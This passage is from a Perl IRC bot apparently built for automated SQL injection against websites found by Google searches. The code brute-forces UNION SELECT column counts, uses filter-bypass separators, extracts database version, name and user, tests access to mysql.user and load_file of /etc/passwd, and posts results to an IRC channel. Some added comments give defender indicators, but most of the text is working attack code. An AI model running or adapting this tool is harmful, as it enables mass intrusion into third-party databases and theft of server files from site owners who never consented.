          || $code =~ /mysql_fetch_array/ig
          || $code =~ /mysql_fetch_assoc/ig
          || $code =~ /mysql_query/ig
          || $code =~ /mysql_free_result/ig
          || $code =~ /equivocado en su sintax/ig
          || $code =~ /You have an error in your SQL syntax/ig
          || $code =~ /Call to undefined function/ig )
      {
          $code1 =
            toma( $page . "-1"
              . $pass1 . "union"
              . $pass1
              . "select"
              . $pass1 . "666"
              . $pass2 );
          if ( $code1 =~
              /The used SELECT statements have a different number of columns/ig )
          {
              my $path = $1;
              chomp $path;
              $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
              $total = "1";
              for my $rows ( 2 .. 52 ) {
                  $asc .= "," . "char("
                    . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
                  $total .= "," . $rows;
                  $injection =
                      $page . "-1"
                    . $pass1 . "union"
                    . $pass1
                    . "select"
                    . $pass1
                    . $alert
                    . $asc;
                  $test = toma($injection);
                  if ( $test =~ /RATSXPDOWN/ ) {
                      # The digits between the markers identify which selected
                      # column is reflected in the page.
                      @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
                      print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
                      print $soquete
                        "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
                      print $soquete
                        "PRIVMSG $canal : [Data] : The number @number print data\r\n";
                      if ( $test =~ /RATSXPDOWN(\d+)/ ) {
                          if ($path) {
                              print $soquete
                                "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
                          }
                          # "hackman" is the placeholder details() later splits on.
                          $total =~ s/@number[0]/hackman/;
                          print $soquete "PRIVMSG $canal : [+] Injection SQL : "
                            . $page . "-1"
                            . $pass1 . "union"
                            . $pass1
                            . "select"
                            . $pass1
                            . $total . "\r\n";
                          &details(
                              $page . "-1"
                                . $pass1 . "union"
                                . $pass1
                                . "select"
                                . $pass1
                                . $total,
                              $_[1]
                          );
                          last;
                      }
                  }
              }
          }
      }

      # Follow-up checks on a URL that contains the "hackman" placeholder.
      # Each request replaces the placeholder with an expression wrapped in
      # the marker char(69,82,84,79,82,56,53,52) ("ERTOR854") and looks for
      # that marker in the response:
      #   - selecting from information_schema.tables and from mysql.user,
      #   - load_file() of 0x2f6574632f706173737764 (hex for "/etc/passwd"),
      #   - version(), database() and user().
      # Defender notes: "ERTOR854", "hackman" and the hex literal are fixed
      # strings to search request logs for.  An application database account
      # without the FILE privilege and without read access to mysql.user
      # makes the load_file and mysql.user checks come back negative.
      sub details {
          my $page = $_[0];
          ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
          if ( $page =~ /(.*)hackman(.*)/ig ) {
              my $start = $1;
              my $end = $2;
              $test1 =
                toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
                  . $end
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.tables"
                  . $pass2 );
              $test2 =
                toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
                  . $end
                  . $pass1 . "from"
                  . $pass1
                  . "mysql.user"
                  . $pass2 );
              $test3 =
                toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
                  . $end
                  . $pass2 );
              if ( $test2 =~ /ERTOR854/ig ) {
                  print $soquete "PRIVMSG $canal : [+] MYSQL User : ON\r\n";
              }
              if ( $test1 =~ /ERTOR854/ig ) {
                  print $soquete
                    "PRIVMSG $canal : [+] information_schema : ON\r\n";
              }
              if ( $test3 =~ /ERTOR854/ig ) {
                  print $soquete "PRIVMSG $canal : [+] load_file : ON\r\n";
              }
              $code =
                toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"
                  . $end
                  . $pass2 );
              if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
                  print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
                  print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
                  print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
              }
              else {
                  print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
              }
              print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
          }
      }
  }
  839.  
  # Map a style selector ($_[0]) to the two-element list (separator,
  # terminator) that the SQL probes in this file splice between keywords and
  # append to the request:
  #   "/*"       -> ( "/**/", "/*" )
  #   "%20"      -> ( "%20", "%00" )
  #   otherwise  -> ( "+", "--" )
  # Defender note: request filters that expect literal spaces between SQL
  # keywords will not match the "+" and "/**/" forms; normalise the query
  # string before pattern matching.
  sub bypass {
      if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
      elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
      else { return ( "+", "--" ); }
  }
  845.  
  # Render a string as a comma-separated list of its decimal code points,
  # e.g. "AB" becomes "65,66".  An empty string yields an empty string.
  sub ascii {
      my ($text) = @_;
      my @code_points = unpack 'U*', $text;
      return join( ',', @code_points );
  }
  849.  
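  # Turn a comma-separated list of decimal code points back into text,
  # e.g. "72,105" becomes "Hi".
  #
  # Works on a private copy of the argument.  The previous version assigned
  # the result back through $_[0], which overwrote the caller's variable and
  # died with "Modification of a read-only value" when given a literal.
  sub ascii_de {
      my ($code_list) = @_;
      return join q[], map { chr } split /,/, $code_list;
  }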
  854.  
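  # Hex-encode a string as "0x" followed by the hex code of each character.
  #
  # Each character is zero-padded to at least two digits: decode() in this
  # file consumes the digits two at a time, so an unpadded code below 0x10
  # (a tab, for instance) would not survive a round trip.  The accumulator is
  # local rather than the package global $hex.
  sub encode {
      my ($string) = @_;
      return '0x' . join q[], map { sprintf '%02x', ord } split //, $string;
  }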
  863.  
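  # Decode a hex string (optional leading "0x") into text, two hex digits per
  # character; a trailing odd digit is ignored.
  #
  # The prefix is stripped from a private copy.  The previous version ran the
  # substitution on $_[0], which removed the "0x" from the caller's variable
  # and died when given a literal.
  sub decode {
      my ($hex) = @_;
      $hex =~ s/^0x//;
      return join q[], map { chr hex } $hex =~ /../g;
  }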
  869.  
  # Collect candidate URLs from a web search.
  #   $a - query text, concatenated into the search URL as-is
  #   $b - upper bound for the "start" offset; offsets 10, 20, ... up to $b
  #        are requested
  # Each result page is fetched with toma(), links are pulled out with
  # get_links(), and only links pointing at the search engine's cache host are
  # kept.  The URL is then taken from between the second ":" and the
  # following "+" of the cache link, cut after its first "=" by cortar(), and
  # de-duplicated by repes().  Returns the resulting list.
  #
  # $pages, $code, @url and the @founds that is pushed to are undeclared
  # package globals, so @url and that @founds keep growing across calls; the
  # "my @founds" on the last assignment is a separate lexical.
  sub google {
      my ( $a, $b ) = @_;
      for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
          $code = toma(
              "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
          my @links = get_links($code);
          for my $l (@links) {
              if ( $l =~ /webcache.googleusercontent.com/ ) {
                  push( @url, $l );
              }
          }
      }
      for (@url) {
          if ( $_ =~ /cache:(.*?):(.*?)\+/ ) {
              push( @founds, $2 );
          }
      }
      my @founds = repes( cortar(@founds) );
      return @founds;
  }
  890.  
  # Return the arguments with repeats dropped, keeping first-seen order.
  # The "seen" counts live in the package global %repe, so a value returned by
  # one call is filtered out of every later call as well.
  sub repes {
      my @unique;
      for my $item (@_) {
          next if $repe{$item}++;
          push @unique, $item;
      }
      return @unique;
  }
  898.  
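  # For every argument that contains "=", keep only the text up to and
  # including the first "="; arguments without "=" pass through unchanged.
  # Returns the new list in the same order.
  #
  # Uses lexical temporaries only; the previous version wrote each split
  # result into the package global @tengo and read it back with the
  # one-element slice @tengo[0].
  sub cortar {
      my @nuevo;
      for my $item (@_) {
          my $cut = index $item, '=';
          push @nuevo, $cut >= 0 ? substr( $item, 0, $cut + 1 ) : $item;
      }
      return @nuevo;
  }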
  912.  
  # Extract link attribute values from the HTML text in $_[0].
  # HTML::LinkExtor calls agarrar() once per link-bearing tag, and agarrar()
  # pushes every attribute value of that tag onto @links.
  #
  # @links and $test are undeclared package globals: @links is never cleared
  # here, so the returned list also contains links gathered by earlier calls.
  sub get_links {
      $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
      return @links;

      # Parser callback: first argument is the tag name, the rest are
      # attribute name/value pairs.
      sub agarrar {
          my ( $a, %b ) = @_;
          push( @links, values %b );
      }
  }
  922.  
  # Fetch the URL in $_[0] with the shared $nave client and return only the
  # response body; status code and headers are discarded, so callers cannot
  # tell an error page from a normal one.
  sub toma {
      my $respuesta = $nave->request( GET( $_[0] ) );
      return $respuesta->content;
  }
  926.  
  # Fetch the URL in $_[0] with the shared $nave client and return the whole
  # response object, so callers can test is_success.
  sub tomax {
      my $respuesta = $nave->request( GET( $_[0] ) );
      return $respuesta;
  }
  930.  
  931. # The End ?